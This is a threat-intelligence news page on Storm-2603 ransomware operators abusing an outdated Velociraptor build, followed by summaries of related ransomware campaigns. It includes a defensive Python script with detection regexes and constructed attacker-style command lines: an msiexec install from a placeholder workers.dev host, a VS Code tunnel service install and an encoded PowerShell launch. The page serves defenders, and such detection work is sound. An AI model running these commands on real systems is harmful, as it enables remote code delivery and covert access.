Mallory

Ransomware Operators Abuse Velociraptor for Persistent Access and Deployment

Tags: ransomware-group-operation, persistence-method, command-and-control-method, operational-disruption, lateral-movement-method
Updated March 21, 2026 at 03:46 PM (6 sources)

Ransomware operators have begun leveraging Velociraptor, an open-source digital forensics and incident response (DFIR) tool, to facilitate and enhance their attacks on enterprise environments. Cisco Talos confirmed that Velociraptor, previously not definitively linked to ransomware campaigns, was used by threat actors believed to be associated with Storm-2603 and possibly a China-based group. These actors targeted VMware ESXi virtual machines and Windows servers, deploying multiple ransomware strains including Warlock, LockBit, and Babuk, which resulted in significant disruption to the victim's IT infrastructure. The attackers installed an outdated version of Velociraptor (0.73.4.0) that contained a privilege escalation vulnerability (CVE-2025-6264), enabling them to execute arbitrary commands and potentially take over endpoints. Velociraptor was used to maintain stealthy, persistent access, allowing the attackers to operate undetected while preparing and executing the ransomware payloads. In addition to Velociraptor, the attackers utilized the Windows msiexec utility to download and install tools from a Cloudflare Workers domain, including Visual Studio Code and the Radmin remote administration tool, further expanding their control and tunneling capabilities. Visual Studio Code was installed as a service and configured to create a tunnel to an attacker-controlled command-and-control (C2) server, with logs redirected for monitoring. The attackers also used encoded PowerShell commands to automate the download and execution of these tools. Sophos incident responders encountered the same threat actors in a separate incident, where they were able to prevent the final deployment of ransomware, but observed the same tactics, techniques, and procedures (TTPs). The use of Velociraptor in these attacks highlights a growing trend of threat actors repurposing legitimate security tools for malicious purposes, complicating detection and response efforts. 
The campaign demonstrates the attackers' ability to combine multiple open-source and commercial tools to achieve persistence, lateral movement, and data exfiltration. The presence of Babuk ransomware files on the victim's network marks a new development, as this strain had not previously been associated with Storm-2603. The attackers' use of multiple ransomware variants in a single campaign suggests a flexible and opportunistic approach to maximizing impact. The exploitation of a known vulnerability in Velociraptor underscores the importance of timely patching and monitoring of security tools themselves. The campaign also involved the use of Cloudflare tunneling and remote administration utilities, indicating a sophisticated approach to maintaining access and evading detection. The incident serves as a warning to organizations about the risks of outdated or misconfigured security tools being turned against them. Security teams are advised to monitor for unusual deployments of DFIR tools and to ensure all such software is kept up to date. The blending of legitimate and malicious activity in these attacks poses significant challenges for defenders, requiring enhanced vigilance and advanced detection capabilities.

Timeline

  1. Oct 11, 2025

    Halcyon links Storm-2603 to possible China state-backed connections

    Subsequent reporting cited Halcyon as assessing that Storm-2603 may have ties to Chinese nation-state actors. The assessment referenced ToolShell access patterns, OPSEC measures, China Standard Time build artifacts, and shared infrastructure across Warlock, LockBit, and Babuk activity.

  2. Oct 10, 2025

    Researchers recommend upgrading Velociraptor to patched versions

    Following public reporting, researchers advised organizations to update Velociraptor to version 0.73.5 or later to mitigate the privilege-escalation issue tracked as CVE-2025-6264. The guidance came as the campaign highlighted the risks of attackers weaponizing legitimate open-source DFIR tools.

  3. Oct 9, 2025

    Cisco Talos publicly attributes the intrusion to Storm-2603

    On October 9, 2025, Cisco Talos published research attributing the August intrusion to Storm-2603 with moderate confidence based on overlapping tools, tradecraft, and the unusual use of multiple ransomware families. The report publicly detailed the abuse of Velociraptor for stealthy persistence in ransomware attacks.

  4. Aug 1, 2025

    Warlock, LockBit, and Babuk ransomware deployed on victim systems

    The intrusion culminated in deployment of multiple ransomware families in a single engagement: LockBit and Warlock-associated encryption on Windows systems and Babuk on VMware ESXi virtual machines. The attack caused severe operational impact and marked the first public association of Storm-2603 with Babuk ransomware.

  5. Aug 1, 2025

    Data exfiltration and double-extortion activity observed

    The attackers used PowerShell-based scripts to exfiltrate data to an external IP address before or alongside encryption, indicating a double-extortion component. Reporting also describes a separate fileless PowerShell encryptor used in the operation.

  6. Aug 1, 2025

    Attackers escalate privileges and weaken defenses

    During the intrusion, the actors used the vulnerable Velociraptor build associated with CVE-2025-6264, though Talos could not confirm direct exploitation of the flaw. They also created administrative accounts, modified Group Policy, disabled or weakened Microsoft Defender protections, and used Impacket Smbexec for lateral movement.

  7. Aug 1, 2025

    Storm-2603 conducts August 2025 intrusion using Velociraptor

    In August 2025, Cisco Talos observed a ransomware intrusion in which attackers installed an outdated Velociraptor version 0.73.4.0 to maintain persistence and control compromised systems. The activity targeted Windows servers and VMware ESXi infrastructure and included access to VMware vSphere.

  8. Aug 1, 2025

    Storm-2603 gains initial access via SharePoint ToolShell flaws

    Reporting indicates the threat actor used on-premises Microsoft SharePoint "ToolShell" vulnerabilities to obtain initial access before deploying follow-on tooling in the victim environment. This initial compromise is described as preceding the August 2025 ransomware intrusion.
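The summary and timeline above describe a handful of observable behaviours: an outdated Velociraptor build below the 0.73.5 fix, msiexec pulling installers from a Cloudflare Workers domain, Visual Studio Code registered as a service to open a tunnel, and encoded PowerShell launchers. The following Python is an added, defender-side triage example written for this page (not code from Talos, Sophos, Mallory or the Velociraptor project); every command line, hostname and version in it is constructed, and the regexes are loose heuristics meant for analyst review rather than production detections.

```python
"""Defender-side checks for the TTPs described above; all samples are constructed."""
import re
from typing import Dict, List

PATCHED_VELOCIRAPTOR = (0, 73, 5)  # first release the timeline cites as fixing CVE-2025-6264

def parse_version(version: str) -> tuple:
    return tuple(int(p) for p in version.strip().split("."))

def velociraptor_vulnerable(version: str) -> bool:
    """True when an installed Velociraptor build predates the patched release."""
    return parse_version(version) < PATCHED_VELOCIRAPTOR

# Triage rules over process command lines; deliberately loose, for analyst review.
RULES = [
    # msiexec installing a package straight from a URL (tools fetched from a Workers domain)
    ("msiexec-remote-install", re.compile(r"\bmsiexec(?:\.exe)?\b.*\s/i\s+https?://", re.I)),
    # any reference to a Cloudflare Workers hostname
    ("cloudflare-workers-url", re.compile(r"https?://[^\s\"']*\.workers\.dev\b", re.I)),
    # VS Code CLI registering a remote tunnel as a service (the C2 channel in the story)
    ("vscode-tunnel-service", re.compile(r"\bcode(?:\.exe|\.cmd)?\b.*\btunnel\b.*\bservice\b", re.I)),
    # PowerShell started with an encoded command
    ("powershell-encoded", re.compile(r"\bpowershell(?:\.exe)?\b.*\s-(?:e|ec|enc|encodedcommand)\s", re.I)),
]

def scan_command_lines(lines: List[str]) -> Dict[str, List[str]]:
    """Map each rule that fired to the command lines it matched."""
    hits: Dict[str, List[str]] = {}
    for line in lines:
        for name, pattern in RULES:
            if pattern.search(line):
                hits.setdefault(name, []).append(line)
    return hits

SAMPLE_COMMAND_LINES = [  # constructed samples, not incident data
    "msiexec.exe /i https://placeholder-worker.workers.dev/vscode.msi /quiet /norestart",
    r'"C:\Program Files\Microsoft VS Code\bin\code.cmd" tunnel service install > C:\Windows\Temp\tunnel.log',
    "powershell.exe -NoP -W Hidden -enc ZQBjAGgAbwAgAGgAaQA=",  # Base64 is UTF-16LE "echo hi"
    r"msiexec.exe /i C:\Installers\7zip.msi /quiet",  # benign: local package, must not fire
    r"powershell.exe -File C:\Scripts\backup.ps1",  # benign: plain script launch
]

if __name__ == "__main__":
    print("Velociraptor 0.73.4.0 vulnerable:", velociraptor_vulnerable("0.73.4.0"))
    for rule, matched in scan_command_lines(SAMPLE_COMMAND_LINES).items():
        print(f"{rule}: {len(matched)} hit(s)")
```

Feed `scan_command_lines` the command-line column of a Sysmon event 1 or EDR process export to get the same per-rule buckets; pair the version check with a software inventory query so an old Velociraptor build is flagged even when no process telemetry is available.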


Related Stories

Recent Ransomware and Malware Campaigns Targeting Organizations and Individuals

A surge in sophisticated cyberattacks has been observed, with threat actors employing a variety of tactics to compromise organizations and individuals. Notable incidents include the use of the BYOVD (Bring Your Own Vulnerable Driver) technique to deploy DeadLock ransomware, as well as targeted campaigns leveraging phishing emails with HR-related lures to distribute Remcos RAT malware. Additionally, attackers are exploiting popular movie torrents to spread Agent Tesla via layered PowerShell scripts, and Android users in Spain are being targeted by the DroidLock ransomware, which can hijack devices and demand ransom through full-screen overlays. These campaigns demonstrate a trend toward multi-stage infection chains, abuse of legitimate tools and drivers, and the use of social engineering to increase the likelihood of successful compromise. Other significant developments include the targeting of Canadian organizations by the STAC6565/Gold Blade group using QWCrypt ransomware, and the emergence of new threat actor tactics such as disabling endpoint detection and response (EDR) systems to facilitate ransomware deployment. The threat landscape is further complicated by the activities of groups like Scattered Lapsus$ Hunters, who use social engineering and typosquatted domains to compromise Zendesk users, and the exposure of internal dynamics within ransomware groups like BlackBasta, revealing operational stress and internal mistrust. These incidents underscore the evolving nature of cyber threats, the blending of espionage and financial motives, and the increasing sophistication of both technical and social attack vectors.

1 month ago
BlackSuit Ransomware Attack on Global Manufacturer via Compromised VPN Credentials

A major global equipment manufacturer suffered a severe ransomware attack orchestrated by the BlackSuit ransomware group, also known as Ignoble Scorpius. The attack began with a vishing (voice phishing) campaign in which an attacker impersonated the company's IT help desk and convinced an employee to enter their VPN credentials into a phishing site. Using these stolen credentials, the attackers gained initial access to the corporate network. Once inside, they escalated privileges by executing a DCSync attack on a domain controller, allowing them to steal highly privileged credentials, including those of a key service account. The attackers then moved laterally across the network using Remote Desktop Protocol (RDP), Server Message Block (SMB), and tools such as Advanced IP Scanner and SMBExec to map the environment and identify valuable assets. Persistence was established by deploying AnyDesk and a custom remote access trojan (RAT) as scheduled tasks on domain controllers. The threat actors compromised a second domain controller and extracted the NTDS.dit database, which contains all user password hashes, enabling further credential compromise. Over 400 GB of sensitive data was exfiltrated using a renamed rclone utility. To erase forensic evidence and hinder incident response, the attackers deployed CCleaner before launching the ransomware payload. The BlackSuit ransomware was deployed using Ansible, resulting in the simultaneous encryption of hundreds of virtual machines across nearly 60 VMware ESXi hosts, causing widespread operational disruption. The attackers demanded a $20 million ransom, which the organization refused to pay. In response, the manufacturer implemented several security measures, including upgrading to newer Cisco Adaptive Security Appliance firewalls, enforcing multi-factor authentication, segmenting the network, deactivating NTLM, and restricting administrative access to isolated VLANs. 
The incident highlights the significant risks posed by social engineering and credential theft, as well as the sophisticated tactics used by modern ransomware groups. The attack demonstrates the importance of robust incident response, credential hygiene, and layered security controls to mitigate the impact of such breaches. The use of legitimate remote access tools and living-off-the-land techniques by the attackers complicated detection and response efforts. The exfiltration of large volumes of sensitive data prior to encryption underscores the dual extortion tactics now common among ransomware operators. The manufacturer’s refusal to pay the ransom and rapid implementation of enhanced security controls serve as a case study in post-incident resilience. The attack also illustrates the growing trend of targeting virtualization infrastructure, such as VMware ESXi hosts, to maximize operational disruption. Security researchers and incident responders continue to analyze the tactics, techniques, and procedures (TTPs) used in this attack to inform defensive strategies for other organizations.

1 month ago
Ransomware Gangs Abuse Legitimate Remote Access Tools to Evade Security Controls

Ransomware operators are increasingly leveraging legitimate remote access tools (RATs) such as AnyDesk, Splashtop, UltraViewer, AppAnywhere, RustDesk, CloneDesk, and TightVNC to facilitate their attacks and bypass traditional security measures. These tools, originally intended for IT administration and remote support, are being misused by cybercriminals to gain persistent, stealthy access to victim networks. Attackers exploit the fact that these RATs are often whitelisted and trusted within enterprise environments, allowing them to evade endpoint detection and response (EDR) solutions and other security controls. The use of legitimate RATs enables adversaries to connect to compromised systems without user interaction, transfer malicious binaries, exfiltrate sensitive data, and execute administrative tasks remotely. Encrypted communications provided by these tools further help attackers avoid network monitoring and detection. Security researchers have observed a trend where ransomware gangs prefer these off-the-shelf RATs over custom malware, as their legitimate signatures and widespread use make them less likely to raise suspicion. The abuse of these tools is often facilitated by poor configuration, lack of monitoring, or inadequate management within organizations. Once inside a network, attackers use RATs to move laterally, harvest credentials, and disable security defenses before deploying ransomware payloads. The sophistication of these campaigns has increased, with adversaries employing advanced evasion techniques and maintaining long-term persistence. Organizations are advised to review their use of remote access tools, ensure proper configuration, and monitor for unusual activity associated with these applications. Security teams should also consider implementing stricter application whitelisting and network segmentation to limit the potential impact of RAT abuse. 
The trend highlights the need for continuous vigilance and updated security policies to address the evolving tactics of ransomware operators. The exploitation of trusted IT tools for malicious purposes underscores the importance of balancing operational convenience with robust security oversight. As ransomware attacks continue to evolve, defenders must adapt their detection and response strategies to account for the abuse of legitimate software. The growing reliance on RATs by threat actors represents a significant challenge for organizations seeking to protect their networks from ransomware threats. Proactive monitoring, user education, and regular security assessments are critical components in mitigating the risks associated with the misuse of remote access tools. Failure to address these vulnerabilities can result in significant data loss, operational disruption, and financial damage due to ransomware incidents.

1 month ago